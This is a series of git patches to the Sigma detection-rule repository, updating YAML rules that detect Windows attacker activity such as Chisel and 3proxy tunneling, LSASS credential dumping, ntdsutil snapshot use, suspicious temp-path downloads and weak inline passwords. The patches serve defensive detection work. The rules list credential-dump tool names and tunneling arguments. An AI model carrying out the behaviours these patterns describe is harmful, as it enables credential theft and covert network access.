CommandLine|contains: + - '%TEMP%' + - '%TMP%' + - ':\RECYCLER\' + - 'C:\$Recycle.bin\' + - ':\SystemVolumeInformation\' + - 'C:\Windows\Temp\' + - 'C:\Temp\' + - 'C:\Users\Public\' + - 'C:\Users\Default\' + - 'C:\Users\Desktop\' + - '\Downloads\' + - '\Temporary Internet Files\Content.Outlook\' + - '\Local Settings\Temporary Internet Files\' + - CommandLine|startswith: + - 'C:\Windows\Tasks\' + - 'C:\Windows\debug\' + - 'C:\Windows\fonts\' + - 'C:\Windows\help\' + - 'C:\Windows\drivers\' + - 'C:\Windows\addins\' + - 'C:\Windows\cursors\' + - 'C:\Windows\system32\tasks\' + - '%Public%\' + condition: (1 of selection*) and susp_image falsepositives: - Legitimate administration level: high diff --git a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml index aa0568d75..1182bd8b4 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml @@ -9,6 +9,7 @@ author: frack113, Nasreddine Bencherchali references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import date: 2022/08/01 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -20,6 +21,7 @@ detection: CommandLine|contains: - 'C:\Users\' - '%temp%' + - '%tmp%' - '%appdata%' - '\AppData\Local\Temp\' - 'C:\Windows\Temp\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 7815daee9..5ca802523 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/07/28 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' selection_susp_extensions: diff --git a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml index be17123fc..cddb6c356 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml @@ -9,6 +9,7 @@ author: Nasreddine Bencherchali references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ date: 2022/08/02 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +35,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' - 'C:\Windows\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml index 07b7eb8f6..8d625c51f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml @@ -11,7 +11,7 @@ references: - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml - https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp date: 2022/07/12 -modified: 2022/07/14 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -31,6 +31,7 @@ detection: - '\Users\Public\' - '\WINDOWS\Temp\' - '%temp%' + - '%tmp%' - '%appdata%' condition: all of selection_* falsepositives: diff --git a/rules/windows/process_creation/proc_creation_win_susp_recon.yml b/rules/windows/process_creation/proc_creation_win_susp_recon.yml index 7af331728..5e97ea32b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_recon.yml @@ -3,6 +3,7 @@ id: aa2efee7-34dd-446e-8a37-40790a66efd7 status: experimental author: frack113 date: 2021/07/30 +modified: 2022/09/13 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md @@ -24,7 +25,9 @@ detection: - 'DOSKEY.EXE' - 'sc.exe' selection_redirect: - ParentCommandLine|contains: ' > %TEMP%\' + ParentCommandLine|contains: + - ' > %TEMP%\' + - ' > %TMP%\' condition: all of selection* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index e0074c19a..daae592e1 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -1,4 +1,4 @@ -title: Suspicious Execution of SharpView Aka PowerView +title: Suspicious Execution of SharpView Aka PowerView id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d status: experimental description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems @@ -8,14 +8,15 @@ references: - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview date: 2021/12/10 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - sharpview: - OriginalFileName: SharpView.exe - sharpview_methods: - Commandline|contains: + selection: + - OriginalFileName: SharpView.exe + - Image|endswith: '\SharpView.exe' + - Commandline|contains: - Get-DomainGPOUserLocalGroupMapping - Find-GPOLocation - Get-DomainGPOComputerLocalGroupMapping @@ -142,7 +143,8 @@ detection: - Get-DomainPolicy - Get-DomainGPOLocalGroup - Get-NetGPOGroup - condition: sharpview or sharpview_methods + - Invoke-Sharefinder + condition: selection falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml index a7895ad42..95a4a857c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml @@ -10,6 +10,7 @@ tags: - attack.t1218.011 author: Christian Burkard date: 2021/11/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -23,6 +24,7 @@ detection: - '%AppData%' - '%LocalAppData%' - '%Temp%' + - '%tmp%' - '\AppData\' - '\Temp\' - '\Users\Public\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml index 999d77e14..7eba3a23c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker date: 2020/10/12 -modified: 2022/08/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +34,7 @@ detection: - '\Windows\Temp\' - '\AppData\Local\' - '%temp%' + - '%tmp%' - '%ProgramData%' - '%appdata%' - '%comspec%' diff --git a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 96d0c1676..b68f4b1eb 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -6,6 +6,7 @@ references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali date: 2022/07/28 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Microsoft\Windows\Start Menu\Programs\Startup\' - '\System32\spool\drivers\color\' # as seen in the knotweed blog - '%temp%' + - '%tmp%' - '%appdata%' condition: selection falsepositives: diff --git a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml index 52af03166..58cc3cf87 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml @@ -11,6 +11,7 @@ references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN date: 2022/08/10 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Desktop\' - '\Downloads\' - '%temp%' + - '%tmp%' - 'iex' - 'Invoke-' - 'rundll32' diff --git a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml index d27416050..ede76c2ee 100755 --- a/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml @@ -6,17 +6,17 @@ references: - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html author: Florian Roth, Markus Neis, Sander Wiebing date: 2018/08/25 -modified: 2022/03/26 +modified: 2022/09/13 logsource: category: registry_set product: windows detection: - selection: - EventType: SetValue - TargetObject|contains: + selection_target: + EventType: SetValue + TargetObject|contains: - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\' - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\' - selection2: + selection_details: - Details|contains: - 'C:\Windows\Temp\' - 'C:\$Recycle.bin\' @@ -25,11 +25,13 @@ detection: - 'C:\Users\Default\' - 'C:\Users\Desktop\' - '\AppData\Local\Temp\' + - '%temp%\' + - '%tmp%\' - Details|startswith: - '%Public%\' - 'wscript' - 'cscript' - condition: selection and selection2 + condition: all of selection_* fields: - Image falsepositives: @@ -37,4 +39,4 @@ falsepositives: level: high tags: - attack.persistence - - attack.t1547.001 \ No newline at end of file + - attack.t1547.001 From 264bc0787d6a0ecd8f81e3f3a2b8580a9f5288e2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 11:30:27 +0200 Subject: [PATCH 014/120] fix: FP with Malwarebytes --- .../proc_access_win_cred_dump_lsass_access.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml index ab575a468..b322595a4 100755 --- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml @@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 -modified: 2022/07/05 +modified: 2022/09/13 references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -119,6 +119,9 @@ detection: filter_webex: SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe' GrantedAccess: '0x401' + filter_malwarebytes: + SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe' + GrantedAccess: '0x1410' # Old - too broad filter # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts # - '\wmiprvse.exe' From 3a38b63fffc361e6b84755bcc4d457ff51fb1932 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 13:38:10 +0200 Subject: [PATCH 015/120] refactor: chisel rules --- .../proc_creation_win_chisel_usage.yml | 36 ++++++++++++++++ .../proc_creation_win_sharp_chisel_usage.yml | 41 +++++++++++-------- 2 files changed, 60 insertions(+), 17 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_chisel_usage.yml diff --git a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml new file mode 100644 index 000000000..ca2ece918 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml @@ -0,0 +1,36 @@ +title: Chisel Tunneling Tool Usage +id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 +related: + - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf + type: similar +status: experimental +description: Detects usage of the Chisel tunneling tool via the commandline arguments +author: Florian Roth +references: + - https://github.com/jpillora/chisel/ +date: 2022/09/13 +tags: + - attack.command_and_control + - attack.t1090.001 +logsource: + category: process_creation + product: windows +detection: + selection_img: + Image|endswith: '\chisel.exe' + selection_param1: + CommandLine|contains: + - 'exe client ' + - 'exe server ' + selection_param2: + CommandLine|contains: + - ' --socks5' + - ' --reverse' + - ' r:' + - ':127.0.0.1:' + - ' --tls-skip-verify ' + - ':socks' + condition: selection_img or all of selection_param* +falsepositives: + - Some false positives may occure with other tools with similar commandlines +level: high diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml index a28f7d2c3..7d472e237 100644 --- a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml @@ -1,5 +1,8 @@ title: SharpChisel Usage id: cf93e05e-d798-4d9e-b522-b0248dc61eaf +related: + - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 + type: similar status: experimental description: Detects usage of the Sharp Chisel via the commandline arguments author: Nasreddine Bencherchali @@ -7,26 +10,30 @@ references: - https://github.com/shantanu561993/SharpChisel - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ date: 2022/09/05 +modified: 2022/09/13 +tags: + - attack.command_and_control + - attack.t1090.001 logsource: category: process_creation product: windows detection: - selection_img: + selection_1_img: Image|endswith: '\SharpChisel.exe' - selection_client_server: - CommandLine|contains: - - 'exe client ' - - 'exe server ' - selection_flags: - CommandLine|contains: - - ' --socks5' - - ' --reverse' - - ' r:' - - ':127.0.0.1:' - condition: 1 of selection_* + selection_1_pe: + Product: 'SharpChisel' + # Covered by Chisel Rule + # selection_2_client_server: + # CommandLine|contains: + # - 'exe client ' + # - 'exe server ' + # selection_2_flags: + # CommandLine|contains: + # - ' --socks5' + # - ' --reverse' + # - ' r:' + # - ':127.0.0.1:' + condition: 1 of selection falsepositives: - - Some flalse positives may occure with other tools with similar commandlines -level: medium -tags: - - attack.command_and_control - - attack.t1090.001 + - Some false positives may occure with other tools with similar commandlines +level: high From 37aed9ac3bff5a6797d27955ba46aadba3f0865e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 13:38:32 +0200 Subject: [PATCH 016/120] docs: add link --- .../windows/process_creation/proc_creation_win_chisel_usage.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml index ca2ece918..0ed05a1e0 100644 --- a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml @@ -8,6 +8,7 @@ description: Detects usage of the Chisel tunneling tool via the commandline argu author: Florian Roth references: - https://github.com/jpillora/chisel/ + - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/ date: 2022/09/13 tags: - attack.command_and_control From 9f62270affd58cc8265653a0803889a7deadbcc9 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 13 Sep 2022 13:38:44 +0200 Subject: [PATCH 017/120] refactor: add dumpy tool --- .../file_event/file_event_win_cred_dump_tools_dropped_files.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml index 4c07b444c..04670a604 100755 --- a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -38,6 +38,7 @@ detection: - '\servpw64.exe' - '\pwdump.exe' - '\procdump64.exe' + - '\Dumpy.exe' condition: selection falsepositives: - Legitimate Administrator using tool for password recovery From fb44c6fa8709d116de3c25be623704a12375e1c0 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 13 Sep 2022 22:14:45 +0200 Subject: [PATCH 018/120] Update meta info --- rules/web/web_cve_2022_31659_vmware_rce.yml | 2 +- .../pipe_created_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../registry_set/registry_set_disable_winevt_logging.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/web/web_cve_2022_31659_vmware_rce.yml b/rules/web/web_cve_2022_31659_vmware_rce.yml index f4c8b747d..8060bcb42 100644 --- a/rules/web/web_cve_2022_31659_vmware_rce.yml +++ b/rules/web/web_cve_2022_31659_vmware_rce.yml @@ -11,7 +11,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the host header to spot the difference between benign and malicious requests to this URL + c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker condition: selection falsepositives: - Vulnerability scanners diff --git a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml index 5a47a8919..3677db9fd 100644 --- a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml @@ -56,5 +56,5 @@ detection: - '\MsFteWds' condition: 1 of selection_malleable_profile* and not filter falsepositives: - - Chrome instances using the exactly same name pipe named mojo.something + - Chrome instances using the exact same pipe name "mojo.something" level: high diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 04c010857..452485411 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -27,7 +27,7 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - filter_empty: + filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' - null From 22d0e22d144bb2da73e2c3614ef0be9c66628fad Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 14 Sep 2022 10:22:01 +0200 Subject: [PATCH 019/120] rule: 3proxy usage, fix: rule - missing contains --- .../proc_creation_win_susp_3proxy_usage.yml | 26 +++++++++++++++++++ ...roc_creation_win_uac_bypass_icmluautil.yml | 4 +-- 2 files changed, 28 insertions(+), 2 deletions(-) create mode 100644 rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml diff --git a/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml new file mode 100644 index 000000000..3a35b6a6c --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml @@ -0,0 +1,26 @@ +title: 3Proxy Usage +id: f38a82d2-fba3-4781-b549-525efbec8506 +status: experimental +description: Detects the use of 3proxy, a tiny free proxy server +author: Florian Roth +date: 2022/09/13 +references: + - https://github.com/3proxy/3proxy + - https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +tags: + - attack.command_and_control + - attack.t1572 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\3proxy.exe' + selection_pe: + Description: '3proxy - tiny proxy server' + selection_params: # param combos seen in the wild + CommandLine|contains: '.exe -i127.0.0.1 -p' + condition: 1 of selection +falsepositives: + - Administrative activity +level: high diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index db964e3ad..81ef7abf7 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml @@ -15,8 +15,8 @@ logsource: product: windows detection: selection: - Image|endswith: '\dllhost.exe' - ParentCommandLine: + PranetImage|endswith: '\dllhost.exe' + ParentCommandLine|contains: - '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' filter: From 653ad66f21010ab20a7c24f7fdb2931460dfe1e3 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:29:57 +0200 Subject: [PATCH 020/120] Updates --- .../win_susp_logon_newcredentials.yml | 0 .../proc_creation_win_dnscmd_discovery.yml | 20 +++++----- ...l => proc_creation_win_ntdsutil_usage.yml} | 18 ++++----- .../proc_creation_win_susp_ditsnap.yml | 23 ++++++----- .../proc_creation_win_susp_ntdsutil_usage.yml | 38 +++++++++++++++++++ ..._creation_win_weak_or_abused_passwords.yml | 26 +++++++++++++ 6 files changed, 95 insertions(+), 30 deletions(-) rename rules/windows/builtin/{ => security}/win_susp_logon_newcredentials.yml (100%) rename rules/windows/process_creation/{proc_creation_win_susp_ntdsutil.yml => proc_creation_win_ntdsutil_usage.yml} (57%) create mode 100644 rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml create mode 100644 rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml diff --git a/rules/windows/builtin/win_susp_logon_newcredentials.yml b/rules/windows/builtin/security/win_susp_logon_newcredentials.yml similarity index 100% rename from rules/windows/builtin/win_susp_logon_newcredentials.yml rename to rules/windows/builtin/security/win_susp_logon_newcredentials.yml diff --git a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml index 2cdf79b9f..805d9eeae 100644 --- a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml @@ -1,23 +1,24 @@ title: Discovery/Execution via dnscmd.exe id: b6457d63-d2a2-4e29-859d-4e7affc153d1 -description: | +description: | Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service. Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain references: - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records - - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd + - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records + - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ status: experimental author: '@gott_cyber' date: 2022/07/31 +modified: 2022/09/14 tags: - - attack.discovery - - attack.execution - - attack.t1543.003 + - attack.discovery + - attack.execution + - attack.t1543.003 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: dnscmd: Image|endswith: '\dnscmd.exe' @@ -25,6 +26,7 @@ detection: CommandLine|contains: - '/enumrecords' - '/enumzones' + - '/ZonePrint' - '/info' selection_2: CommandLine|contains|all: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml similarity index 57% rename from rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml rename to rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml index ff90db27b..312a8ba58 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml +++ b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml @@ -4,19 +4,19 @@ status: test description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) author: Thomas Patzke references: - - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm date: 2019/01/16 modified: 2022/03/11 # increased level logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ntdsutil.exe' - condition: selection + selection: + Image|endswith: '\ntdsutil.exe' + condition: selection falsepositives: - - NTDS maintenance + - NTDS maintenance level: medium tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml index 780851390..e6c83822a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml @@ -4,22 +4,21 @@ status: test description: Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups. author: 'Furkan Caliskan (@caliskanfurkan_)' references: - - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - - https://github.com/yosqueoy/ditsnap + - https://thedfirreport.com/2020/06/21/snatch-ransomware/ + - https://github.com/yosqueoy/ditsnap date: 2020/07/04 modified: 2021/11/27 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ditsnap.exe' - selection2: - CommandLine|contains: 'ditsnap.exe' - condition: selection or selection2 + selection: + - Image|endswith: '\ditsnap.exe' + - CommandLine|contains: 'ditsnap.exe' + condition: selection falsepositives: - - Legitimate admin usage + - Legitimate admin usage level: high tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml new file mode 100644 index 000000000..cff53a918 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml @@ -0,0 +1,38 @@ +title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) +id: a58353df-af43-4753-bad0-cd83ef35eef5 +related: + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived +status: experimental +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. +author: Nasreddine Bencherchali +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +date: 2022/09/14 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: '\ntdsutil.exe' + - OriginalFileName: 'ntdsutil.exe' + selection_cli: + - CommandLine|contains|all: + - 'snapshot' + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - 'ac' + - ' i' + - ' ntds' + condition: all of selection_* +falsepositives: + - Legitimate usage to restore snapshots + - Legitimate admin activity +level: medium +tags: + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml new file mode 100644 index 000000000..0afe7b43e --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml @@ -0,0 +1,26 @@ +title: Weak or Abused Passwords In CLI +id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 +status: experimental +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline +references: + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +author: Nasreddine Bencherchali +date: 2022/09/14 +tags: + - attack.defense_evasion + - attack.execution +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + # Add more passwords + - 'Asd123.aaaa' + - 'password123' + - '123456789' + condition: selection +falsepositives: + - Legitimate usage of the passwords by users via commandline (should be discouraged) + - Other currently unknown false positives +level: medium From 02cfd972edf108f8527c50e8b9eabee51250e624 Mon Sep 17 00:00:00 2001 From: krestinichev <100998565+krestinichev@users.noreply.github.com> Date: Wed, 14 Sep 2022 15:37:51 +0300 Subject: [PATCH 021/120] Add files via upload --- .../proc_creation_disable_SEP.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_disable_SEP.yml diff --git 